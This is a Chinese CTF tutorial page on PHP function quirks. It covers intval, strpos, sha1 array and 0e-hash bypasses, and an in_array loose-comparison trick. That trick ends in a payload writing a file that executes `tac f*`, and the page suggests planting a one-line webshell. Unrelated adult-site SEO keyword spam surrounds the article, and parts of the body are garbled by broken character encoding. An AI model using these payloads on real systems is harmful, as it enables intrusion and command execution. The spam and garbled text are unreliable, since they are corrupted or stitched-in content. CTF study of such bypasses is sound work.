日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

CTF中的PHP特性函數(shù)解析之中篇

瀏覽:322日期:2022-06-06 15:55:04
目錄
  • 前言
  • intval()
  • strpos()
  • sha1
    • 數(shù)組比較
    • 強類型
  • array_push()
    • 結語

      前言

      上篇文章給大家?guī)砹薖HP中最基本的特性,不知道大家學習的怎樣了,回顧上文,我們講了MD5強弱碰撞以及正則匹配的繞過,總體來看還是很簡單的,下面給大家?guī)硇碌腜HP特性講解,會稍微比上一篇難一些。

      intval()

      上一篇在最后時簡單介紹了一下這個函數(shù),我們看看官方是怎樣定義的:

      簡單來說就是讓輸入的數(shù)字變成整數(shù),下面我們舉個例子:

      echo intval(1145.14);     // 1145echo intval("114514");    // 114514

      可以發(fā)現(xiàn)只對有小數(shù)點的數(shù)字起作用,正常的整數(shù)還是照常輸出,那么它在CTF中是如何考察的呢,查看下面代碼:

      if($num==="1145"){die("no no no!");    }    if(intval($num,0)===1145){echo $flag;    }

      要我們強類型傳入的不能等于1145,但后面經過intval函數(shù)又要等于1145,這不和前面的矛盾了,我們要怎樣做呢?

      這里介紹一下intval的特性,如果我們在函數(shù)里傳入字符串,那么該函數(shù)就會返回不是數(shù)字的字符之前的數(shù)字,也就是說我們傳入:

      sum=1145a

      intval就會判斷我們傳入的是1145,從而實現(xiàn)了繞過,還有另一種繞過方法:

      當base為0時,intval會自動進行進制轉換,我們可以傳入1145的十六進制形式來繞過。

      strpos()

      根據(jù)手冊可以看到,該函數(shù)以及與其類似的函數(shù),作用都是匹配第一個或者最后一個字符,根據(jù)該函數(shù)特性,題目會經常圍繞它作為一個限制頭部的點,比如上面那題可能會增加限制:

       if(!strpos($num, "0")){die("no no no!");

      因為八進制開頭通常為0,檢測到的話就不能通過進制轉換來繞過了。

      sha1

      p>該函數(shù)的利用以及繞過方法類似于MD5函數(shù),都是運用了PHP特性來做,這里簡單看一下:

      數(shù)組比較

      類似于MD5,在SHA1里我們也可以使用數(shù)組繞過,具體可以看下面例子:

      if(sha1($a)==sha1($b) && $a!=$b){  	echo $flag;}

      可以看到,也是一個弱比較,根據(jù)PHP特性sha1函數(shù)無法對數(shù)組進行處理,,于是我們傳入數(shù)組來使結果為NULL:

      a[]=1b[]=2

      強類型

      與MD5相同,當然也存在強類型比較,我們不能用數(shù)組來進行繞過了:

      if(sha1($a)===sha1($b) && $a!=$b){  	echo $flag;}

      這里同樣有類似于MD5函數(shù)的解決方法:

      a=aaK1STf    //0e7665852665575620768827115962402601b=aaO8zKZF   //0e89257456677279068558073954252716165

      array_push()

      可以理解為向數(shù)組尾部插入參數(shù),我們看看是如何考察的:

      <?phphighlight_file(__FILE__);$allow = array();for ($i=36; $i < 0x36d; $i++) {     array_push($allow, rand(1,$i));}if(isset($_GET["n"]) && in_array($_GET["n"], $allow)){    file_put_contents($_GET["n"], $_POST["content"]);}?>

      可以看到題目先向數(shù)組里插入隨機數(shù),in_array()是搜索數(shù)組中是否存在指定的值,根據(jù)它的語法:

      type會判斷類型是否匹配,這就是我們利用的點,因為數(shù)組里數(shù)據(jù)為int型,根據(jù)PHP特性比較后字符串會轉成int型,也就是說我們傳入1.php也是沒有問題的,后面有個寫入文件操作,正好可以設置一句話木馬連接后門,或者進行命令執(zhí)行:

      get:  n=1.phppost: content=&lt;?=`tac f*`;

      結語

      今天這篇文章可能有的地方不是很好理解,但總體來說還是很簡單的,PHP特性很多以至于只能挑出一些著名的來說,更多關于CTF PHP特性函數(shù)的資料請關注其它相關文章!

      標簽: PHP
      日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
      在线国产精品一区| 国精品产品一区| 高清一区二区| 国产精品亚洲欧美一级在线| 日韩一区二区久久| 中文亚洲免费| 国产亚洲精品久久久久婷婷瑜伽| 国产美女高潮在线| 新版的欧美在线视频| 国产伊人久久| 日韩精品免费一区二区三区| 国产亚洲一区二区手机在线观看 | 欧美99久久| 国产+成+人+亚洲欧洲在线| 欧美黄页在线免费观看| 日本成人精品| 日韩国产精品久久久久久亚洲| 免费一区二区视频| 亚洲91在线| 国产日韩高清一区二区三区在线| 国产精品一区二区美女视频免费看| 日韩精品一区第一页| 亚洲精品1区2区| 美女精品网站| 国产精品综合色区在线观看| 国产a亚洲精品| 蜜桃国内精品久久久久软件9| 久久aⅴ国产紧身牛仔裤| www.九色在线| 亚洲午夜精品久久久久久app| 一区福利视频| 日韩国产91| 国产精品伦理久久久久久| 亚洲国内精品| 天堂av一区| 国产精品成人国产| 国产精品99久久久久久董美香| 久久爱www.| 日本久久成人网| 91精品推荐| 人人精品亚洲| 亚洲国产成人精品女人| 亚洲精品自拍| 欧美激情综合| 午夜精品免费| 国产精品777777在线播放| 国产高清不卡| 免费成人在线视频观看| 麻豆成人91精品二区三区| 亚洲成人一区在线观看| 日韩精品第二页| 精品视频在线一区二区在线| 国产视频一区三区| 精品久久97| 91成人在线网站| 激情综合网址| 精品亚洲成人| 精品一区三区| 亚洲欧洲专区| 尤物精品在线| 国产 日韩 欧美 综合 一区| 一区二区日韩免费看| 欧美日韩国产观看视频| 日韩精品三级| 五月婷婷六月综合| 成人在线免费观看网站| 视频一区二区国产| 日韩av免费大片| 国产欧美在线| 亚洲我射av| 香蕉国产精品| 日韩久久精品| 国产精品亚洲产品| 亚州国产精品| 三级欧美在线一区| 好吊一区二区三区| se01亚洲视频| 成人在线网站| 欧美国产中文高清| 亚洲ww精品| 热久久久久久久| 欧美sss在线视频| 成人亚洲欧美| 国产精品99视频| 久久精品国产一区二区| 久久不见久久见免费视频7| 国产免费av一区二区三区| 国产亚洲一卡2卡3卡4卡新区| 欧美三区不卡| 国产精品美女久久久久久不卡| 亚洲欧美日韩专区| 婷婷亚洲五月| 亚洲国内欧美| 欧美天堂亚洲电影院在线观看| 亚洲激情中文| 尹人成人综合网| 一区视频在线| 99视频在线精品国自产拍免费观看| 怡红院精品视频在线观看极品| 99在线|亚洲一区二区| 亚洲精选成人| **爰片久久毛片| 国产99精品| 日韩欧美中文字幕一区二区三区 | 久久精品99久久久| 成人精品久久| 亚洲主播在线| 国产精品v一区二区三区| 亚洲精品99| 国产精品探花在线观看| 国产精品调教| 国产综合精品| 国产视频一区二| 久久蜜桃资源一区二区老牛| 亚洲先锋成人| 麻豆精品久久久| 欧美日韩高清| 久久一区精品| 噜噜噜躁狠狠躁狠狠精品视频| 久久99青青| 国产精品日本欧美一区二区三区| 国产日韩一区二区三区在线 | 国产精品片aa在线观看| 日韩综合精品| 国产精品一区二区三区av麻 | 免费人成黄页网站在线一区二区| 久久久久国产精品一区二区| 日韩一区二区三区精品| 亚洲播播91| 欧美成人精品一级| 视频一区中文字幕精品| 欧美另类专区| 黄色在线观看www| 国产精品夜夜夜| 亚洲免费精品| 久久精品国内一区二区三区| 蜜桃av一区二区| 欧美亚洲在线日韩| 日韩国产一区二区三区| 久久亚洲道色| 欧美一区二区三区久久| 国产模特精品视频久久久久| 欧美日韩尤物久久| 日韩毛片视频| 久久久久美女| 亚洲va中文在线播放免费| 日本不卡的三区四区五区| 麻豆亚洲精品| 伊人久久大香伊蕉在人线观看热v| 性欧美69xoxoxoxo| 裤袜国产欧美精品一区| 国产精品入口久久| 国产一二在线播放| 秋霞国产精品| 狠狠久久婷婷| 三级欧美韩日大片在线看| 日精品一区二区三区| 国产日韩三级| 国产精品久久久久久久久妇女| 免费一级欧美在线观看视频| 日韩精品三区四区| 亚洲www免费| 91久久久精品国产| 蜜桃视频一区二区三区| 18国产精品| 日韩精品一级| 国产美女视频一区二区| 精品久久网站| 91精品电影| 欧美中文高清| 精品久久影院| 黄色欧美日韩| 久久av网站| 久久精品亚洲欧美日韩精品中文字幕| 欧美另类专区| 91精品国产自产观看在线| 国产精品专区免费| 国产婷婷精品| 欧美激情在线精品一区二区三区| 亚洲综合在线电影| 欧美日韩视频| 国际精品欧美精品| 日韩中文字幕区一区有砖一区 | 久久超级碰碰| 日韩视频中文| 国产麻豆精品| 一区久久精品| 欧美aⅴ一区二区三区视频| 在线 亚洲欧美在线综合一区| 国产欧美综合一区二区三区| 国产伊人精品| 久久国产精品色av免费看| 婷婷中文字幕一区| 国产成人久久精品一区二区三区| 亚洲a级精品| 亚洲精品在线影院| 欧美日韩一区二区三区不卡视频 | 黄色aa久久| 精品99在线| 亚洲香蕉久久|